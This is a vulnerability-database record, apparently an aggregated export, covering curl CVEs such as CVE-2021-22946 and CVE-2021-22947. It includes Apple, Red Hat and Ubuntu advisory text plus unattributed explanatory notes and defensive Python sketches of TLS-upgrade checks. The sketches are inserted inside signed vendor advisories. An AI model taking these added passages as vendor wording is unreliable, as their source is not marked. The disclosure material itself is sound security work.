"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24736"
},
{
"trust": 0.1,
"url": "https://volsync.readthedocs.io/en/stable/."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:4576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-38408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2283"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync-rep"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-3089"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-24329"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1667"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-26604"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2023-001"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-24329"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-27535"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-3089"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-26604"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-36227"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428403"
},
{
"db": "VULMON",
"id": "CVE-2022-35252"
},
{
"db": "PACKETSTORM",
"id": "168239"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170698"
},
{
"db": "PACKETSTORM",
"id": "176746"
},
{
"db": "PACKETSTORM",
"id": "172378"
},
{
"db": "PACKETSTORM",
"id": "172587"
},
{
"db": "PACKETSTORM",
"id": "172195"
},
{
"db": "PACKETSTORM",
"id": "174080"
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
},
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-428403",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-35252",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168239",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170697",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170698",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "176746",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172378",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172587",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172195",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "174080",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-35252",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-09-23T00:00:00",
"db": "VULHUB",
"id": "VHN-428403",
"ident": null
},
{
"date": "2022-09-02T15:21:41",
"db": "PACKETSTORM",
"id": "168239",
"ident": null
},
{
"date": "2022-12-19T13:48:31",
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"date": "2023-01-24T16:41:07",
"db": "PACKETSTORM",
"id": "170697",
"ident": null
},
{
"date": "2023-01-24T16:41:28",
"db": "PACKETSTORM",
"id": "170698",
"ident": null
},
{
"date": "2024-01-26T15:24:15",
"db": "PACKETSTORM",
"id": "176746",
"ident": null
},
{
"date": "2023-05-16T17:09:54",
"db": "PACKETSTORM",
"id": "172378",
"ident": null
},
{
"date": "2023-05-26T14:34:05",
"db": "PACKETSTORM",
"id": "172587",
"ident": null
},
{
"date": "2023-05-09T15:14:58",
"db": "PACKETSTORM",
"id": "172195",
"ident": null
},
{
"date": "2023-08-09T15:56:32",
"db": "PACKETSTORM",
"id": "174080",
"ident": null
},
{
"date": "2022-08-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202208-4523",
"ident": null
},
{
"date": "2022-09-23T14:15:12.323000",
"db": "NVD",
"id": "CVE-2022-35252",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-03-01T00:00:00",
"db": "VULHUB",
"id": "VHN-428403",
"ident": null
},
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202208-4523",
"ident": null
},
{
"date": "2025-05-05T17:18:16.463000",
"db": "NVD",
"id": "CVE-2022-35252",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "curl Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
}
],
"trust": 0.6
}
}
VAR-202109-1790
Vulnerability from variot - Updated: 2026-03-09 22:30
A user can tell curl >= 7.20.0 and <= 7.78.0 to require a successful upgrade to TLS when speaking to an IMAP, POP3 or FTP server (--ssl-reqd on the command line or CURLOPT_USE_SSL set to CURLUSESSL_CONTROL or CURLUSESSL_ALL with libcurl). This requirement could be bypassed if the server would return a properly crafted but perfectly legitimate response. This flaw would then make curl silently continue its operations without TLS, contrary to the instructions and expectations, exposing possibly sensitive data in clear text over the network. A security issue was found in curl prior to 7.79.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
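The STARTTLS-bypass class of flaw described for CVE-2021-22946 above comes down to one client-side check: after requesting a TLS upgrade (STARTTLS for IMAP, STLS for POP3, AUTH TLS for FTP), the client must abort unless the server's reply is an unambiguous single-line success. The sketch below is illustrative only — the response strings and the helper name are assumptions for the example, not curl's actual implementation.

```python
def must_upgrade_to_tls(reply: str) -> bool:
    """Return True only for a clean single-line success reply.

    Anything else -- an error status, or extra lines smuggled in after
    the status line (response injection) -- must abort the connection
    rather than silently continue in clear text.
    """
    lines = reply.splitlines()
    if len(lines) != 1:
        # Extra lines before the TLS handshake suggest injection.
        return False
    line = lines[0]
    # POP3 success: "+OK ...", FTP success for AUTH TLS: "234 ..."
    if line.startswith("+OK") or line.startswith("234"):
        return True
    # IMAP success: "<tag> OK ..."
    parts = line.split(maxsplit=2)
    return len(parts) >= 2 and parts[1] == "OK"
```

A vulnerable client is one that accepts a crafted-but-legitimate-looking reply (or buffered extra data) and proceeds without TLS; the fix in curl 7.79.0 was to enforce this kind of strict check.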
APPLE-SA-2022-03-14-4 macOS Monterey 12.3
macOS Monterey 12.3 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213183.
Accelerate Framework Available for: macOS Monterey Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2022-22633: an anonymous researcher
AMD Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-22669: an anonymous researcher
AppKit Available for: macOS Monterey Impact: A malicious application may be able to gain root privileges Description: A logic issue was addressed with improved validation. CVE-2022-22665: Lockheed Martin Red Team
AppleGraphicsControl Available for: macOS Monterey Impact: An application may be able to gain elevated privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-22631: an anonymous researcher
AppleScript Available for: macOS Monterey Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro
AppleScript Available for: macOS Monterey Impact: An application may be able to read restricted memory Description: This issue was addressed with improved checks. CVE-2022-22648: an anonymous researcher
AppleScript Available for: macOS Monterey Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro CVE-2022-22627: Qi Sun and Robert Ai of Trend Micro
AppleScript Available for: macOS Monterey Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2022-22597: Qi Sun and Robert Ai of Trend Micro
BOM Available for: macOS Monterey Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks Description: This issue was addressed with improved checks. CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)
curl Available for: macOS Monterey Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.79.1. CVE-2021-22946 CVE-2021-22947 CVE-2021-22945 CVE-2022-22623
FaceTime Available for: macOS Monterey Impact: A user may send audio and video in a FaceTime call without knowing that they have done so Description: This issue was addressed with improved checks. CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida
ImageIO Available for: macOS Monterey Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2022-22611: Xingyu Jin of Google
ImageIO Available for: macOS Monterey Impact: Processing a maliciously crafted image may lead to heap corruption Description: A memory consumption issue was addressed with improved memory handling. CVE-2022-22612: Xingyu Jin of Google
Intel Graphics Driver Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved state handling. CVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba Security Pandora Lab
IOGPUFamily Available for: macOS Monterey Impact: An application may be able to gain elevated privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-22641: Mohamed Ghannam (@_simo36)
Kernel Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-22613: Alex, an anonymous researcher
Kernel Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-22614: an anonymous researcher CVE-2022-22615: an anonymous researcher
Kernel Available for: macOS Monterey Impact: A malicious application may be able to elevate privileges Description: A logic issue was addressed with improved state management. CVE-2022-22632: Keegan Saunders
Kernel Available for: macOS Monterey Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A null pointer dereference was addressed with improved validation. CVE-2022-22638: derrek (@derrekr6)
Kernel Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved validation. CVE-2022-22640: sqrtpwn
libarchive Available for: macOS Monterey Impact: Multiple issues in libarchive Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation. CVE-2021-36976
Login Window Available for: macOS Monterey Impact: A person with access to a Mac may be able to bypass Login Window Description: This issue was addressed with improved checks. CVE-2022-22647: an anonymous researcher
LoginWindow Available for: macOS Monterey Impact: A local attacker may be able to view the previously logged-in user’s desktop from the fast user switching screen Description: An authentication issue was addressed with improved state management. CVE-2022-22656
GarageBand MIDI Available for: macOS Monterey Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution Description: A memory initialization issue was addressed with improved memory handling. CVE-2022-22657: Brandon Perry of Atredis Partners
GarageBand MIDI Available for: macOS Monterey Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2022-22664: Brandon Perry of Atredis Partners
NSSpellChecker Available for: macOS Monterey Impact: A malicious application may be able to access information about a user's contacts Description: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. CVE-2022-22644: an anonymous researcher
PackageKit Available for: macOS Monterey Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved state management. CVE-2022-22617: Mickey Jin (@patch1t)
Preferences Available for: macOS Monterey Impact: A malicious application may be able to read other applications' settings Description: The issue was addressed with additional permissions checks. CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)
QuickTime Player Available for: macOS Monterey Impact: A plug-in may be able to inherit the application's permissions and access user data Description: This issue was addressed with improved checks. CVE-2022-22650: Wojciech Reguła (@_r3ggi) of SecuRing
Safari Downloads Available for: macOS Monterey Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks Description: This issue was addressed with improved checks. CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)
Sandbox Available for: macOS Monterey Impact: A malicious application may be able to bypass certain Privacy preferences Description: The issue was addressed with improved permissions logic. CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran
Siri Available for: macOS Monterey Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen Description: A permissions issue was addressed with improved validation. CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg/)
SMB Available for: macOS Monterey Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-22651: Felix Poulin-Belanger
SoftwareUpdate Available for: macOS Monterey Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved state management. CVE-2022-22639: Mickey Jin (@patch1t)
System Preferences Available for: macOS Monterey Impact: An app may be able to spoof system notifications and UI Description: This issue was addressed with a new entitlement. CVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)
UIKit Available for: macOS Monterey Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions Description: This issue was addressed with improved checks. CVE-2022-22621: Joey Hewitt
Vim Available for: macOS Monterey Impact: Multiple issues in Vim Description: Multiple issues were addressed by updating Vim. CVE-2021-4136 CVE-2021-4166 CVE-2021-4173 CVE-2021-4187 CVE-2021-4192 CVE-2021-4193 CVE-2021-46059 CVE-2022-0128 CVE-2022-0156 CVE-2022-0158
VoiceOver Available for: macOS Monterey Impact: A user may be able to view restricted content from the lock screen Description: A lock screen issue was addressed with improved state management. CVE-2021-30918: an anonymous researcher
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A cookie management issue was addressed with improved state management. WebKit Bugzilla: 232748 CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 232812 CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 233172 CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab WebKit Bugzilla: 234147 CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. WebKit Bugzilla: 234966 CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative
WebKit Available for: macOS Monterey Impact: A malicious website may cause unexpected cross-origin behavior Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 235294 CVE-2022-22637: Tom McKee of Google
Wi-Fi Available for: macOS Monterey Impact: A malicious application may be able to leak sensitive user information Description: A logic issue was addressed with improved restrictions. CVE-2022-22668: MrPhil17
xar Available for: macOS Monterey Impact: A local user may be able to write arbitrary files Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. CVE-2022-22582: Richard Warren of NCC Group
Additional recognition
AirDrop We would like to acknowledge Omar Espino (omespino.com), Ron Masas of BreakPoint.sh for their assistance.
Bluetooth We would like to acknowledge an anonymous researcher, chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab for their assistance.
Face Gallery We would like to acknowledge Tian Zhang (@KhaosT) for their assistance.
Intel Graphics Driver We would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi Wu (@3ndy1) for their assistance.
Local Authentication We would like to acknowledge an anonymous researcher for their assistance.
Notes We would like to acknowledge Nathaniel Ekoniak of Ennate Technologies for their assistance.
Password Manager We would like to acknowledge Maximilian Golla (@m33x) of Max Planck Institute for Security and Privacy (MPI-SP) for their assistance.
Siri We would like to acknowledge an anonymous researcher for their assistance.
syslog We would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.
TCC We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.
UIKit We would like to acknowledge Tim Shadel of Day Logger, Inc. for their assistance.
WebKit We would like to acknowledge Abdullah Md Shaleh for their assistance.
WebKit Storage We would like to acknowledge Martin Bajanik of FingerprintJS for their assistance.
macOS Monterey 12.3 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
=====================================================================
                   Red Hat Security Advisory

Synopsis:          Moderate: curl security update
Advisory ID:       RHSA-2022:0635-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:0635
Issue date:        2022-02-22
CVE Names:         CVE-2021-22946 CVE-2021-22947
=====================================================================
- Summary:
An update for curl is now available for Red Hat Enterprise Linux 8.2 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
- curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols (CVE-2021-22946)

- curl: Server responses received before STARTTLS processed after TLS handshake (CVE-2021-22947)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
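The STARTTLS flaw (CVE-2021-22947) comes down to trusting bytes a server sent before the TLS handshake finished. A minimal sketch of the safe behavior the fix restores, using a simplified POP3-style reader (the class and method names here are illustrative, not curl's internals):

```python
# Sketch of the defensive behavior behind the CVE-2021-22947 fix: any bytes
# a server pipelines *before* the TLS handshake completes must be discarded,
# because a man-in-the-middle could have injected them in plaintext.

class StartTlsReader:
    def __init__(self):
        self.buffer = b""
        self.tls_active = False

    def feed(self, data: bytes) -> None:
        # Bytes arrive from the socket and are queued for the protocol parser.
        self.buffer += data

    def complete_tls_handshake(self) -> None:
        # Drop anything still queued from the plaintext phase.
        self.buffer = b""
        self.tls_active = True

    def next_response(self) -> bytes:
        data, self.buffer = self.buffer, b""
        return data


reader = StartTlsReader()
reader.feed(b"+OK injected reply\r\n")    # sent before STARTTLS finished
reader.complete_tls_handshake()
reader.feed(b"+OK genuine reply\r\n")     # sent inside the TLS tunnel
print(reader.next_response())             # only the post-TLS bytes survive
```

A vulnerable client is one that skips the buffer reset in `complete_tls_handshake`, so an attacker's plaintext bytes would be parsed as if they had arrived inside the tunnel.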
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux BaseOS EUS (v. 8.2):
Source: curl-7.61.1-12.el8_2.4.src.rpm
aarch64: curl-7.61.1-12.el8_2.4.aarch64.rpm curl-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm curl-debugsource-7.61.1-12.el8_2.4.aarch64.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm libcurl-7.61.1-12.el8_2.4.aarch64.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm libcurl-devel-7.61.1-12.el8_2.4.aarch64.rpm libcurl-minimal-7.61.1-12.el8_2.4.aarch64.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm
ppc64le: curl-7.61.1-12.el8_2.4.ppc64le.rpm curl-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm curl-debugsource-7.61.1-12.el8_2.4.ppc64le.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-devel-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-minimal-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm
s390x: curl-7.61.1-12.el8_2.4.s390x.rpm curl-debuginfo-7.61.1-12.el8_2.4.s390x.rpm curl-debugsource-7.61.1-12.el8_2.4.s390x.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.s390x.rpm libcurl-7.61.1-12.el8_2.4.s390x.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.s390x.rpm libcurl-devel-7.61.1-12.el8_2.4.s390x.rpm libcurl-minimal-7.61.1-12.el8_2.4.s390x.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.s390x.rpm
x86_64: curl-7.61.1-12.el8_2.4.x86_64.rpm curl-debuginfo-7.61.1-12.el8_2.4.i686.rpm curl-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm curl-debugsource-7.61.1-12.el8_2.4.i686.rpm curl-debugsource-7.61.1-12.el8_2.4.x86_64.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.i686.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm libcurl-7.61.1-12.el8_2.4.i686.rpm libcurl-7.61.1-12.el8_2.4.x86_64.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.i686.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm libcurl-devel-7.61.1-12.el8_2.4.i686.rpm libcurl-devel-7.61.1-12.el8_2.4.x86_64.rpm libcurl-minimal-7.61.1-12.el8_2.4.i686.rpm libcurl-minimal-7.61.1-12.el8_2.4.x86_64.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.i686.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2021-22946 https://access.redhat.com/security/cve/CVE-2021-22947 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
==========================================================================
Ubuntu Security Notice USN-5079-3
September 21, 2021
curl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 18.04 LTS
Summary:
USN-5079-1 fixed vulnerabilities in curl. One of the fixes introduced a regression on Ubuntu 18.04 LTS. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
It was discovered that curl incorrectly handled memory when sending data to an MQTT server. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2021-22945) Patrick Monnerat discovered that curl incorrectly handled upgrades to TLS. A remote attacker could possibly use this issue to obtain sensitive information. (CVE-2021-22946) Patrick Monnerat discovered that curl incorrectly handled responses received before STARTTLS. A remote attacker could possibly use this issue to inject responses and intercept communications. (CVE-2021-22947)
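For CVE-2021-22946, the fix means that when the caller has demanded TLS, a server's refusal must abort the session rather than silently downgrade it. A hedged sketch of those semantics (this models the intent of `--ssl-reqd` / `CURLOPT_USE_SSL`, not libcurl's actual code; the function and reply strings are illustrative):

```python
# Model of the behavior mandated by the CVE-2021-22946 fix: with TLS
# required, any server reply other than a successful upgrade acknowledgement
# must be fatal instead of falling back to cleartext.

class TlsRequiredError(Exception):
    """Raised when a mandated TLS upgrade cannot be completed."""

def negotiate_channel(require_tls: bool, server_reply: str) -> str:
    if server_reply == "+OK Begin TLS negotiation":
        return "tls"
    if require_tls:
        # Vulnerable versions fell through to "plaintext" here when the
        # server sent a crafted but perfectly legitimate refusal.
        raise TlsRequiredError("server declined STARTTLS; refusing cleartext")
    return "plaintext"
```

For example, `negotiate_channel(True, "-ERR TLS unavailable")` raises instead of quietly continuing without encryption, which is exactly the downgrade the vulnerable versions allowed.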
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.16 libcurl3-gnutls 7.58.0-2ubuntu3.16 libcurl3-nss 7.58.0-2ubuntu3.16 libcurl4 7.58.0-2ubuntu3.16
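To check whether an installed package meets the fixed versions above, a rough sketch is possible; note this simplified comparison ignores dpkg's epoch and `~` ordering rules, so `dpkg --compare-versions` remains the authoritative tool:

```python
import re

def version_key(v: str):
    # Split "7.58.0-2ubuntu3.16" into alternating numeric/text chunks so the
    # numeric parts compare as integers ("16" > "9") rather than as strings.
    return [int(t) if t.isdigit() else t for t in re.findall(r"\d+|\D+", v)]

def is_patched(installed: str, fixed: str) -> bool:
    # Rough check only: real dpkg ordering also handles epochs and '~'.
    return version_key(installed) >= version_key(fixed)

# e.g. a host still on an earlier build:
# is_patched("7.58.0-2ubuntu3.15", "7.58.0-2ubuntu3.16") -> False
```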
In general, a standard system update will make all the necessary changes.

Summary:
The Migration Toolkit for Containers (MTC) 1.5.2 is now available.

Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.

Bugs fixed (https://bugzilla.redhat.com/):
2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution 2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport) 2006842 - MigCluster CR remains in "unready" state and source registry is inaccessible after temporary shutdown of source cluster 2007429 - "oc describe" and "oc log" commands on "Migration resources" tree cannot be copied after failed migration 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)
- Solution:
For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html
For Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html
- Bugs fixed (https://bugzilla.redhat.com/):
1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option 1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option
- JIRA issues fixed (https://issues.jboss.org/):
LOG-1858 - OpenShift Alerting Rules Style-Guide Compliance LOG-1917 - [release-5.1] Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core console",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "communications cloud native core service communication proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "sinec infrastructure network services",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0.1.1"
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.26"
},
{
"_id": null,
"model": "communications cloud native core security edge protection proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "mysql server",
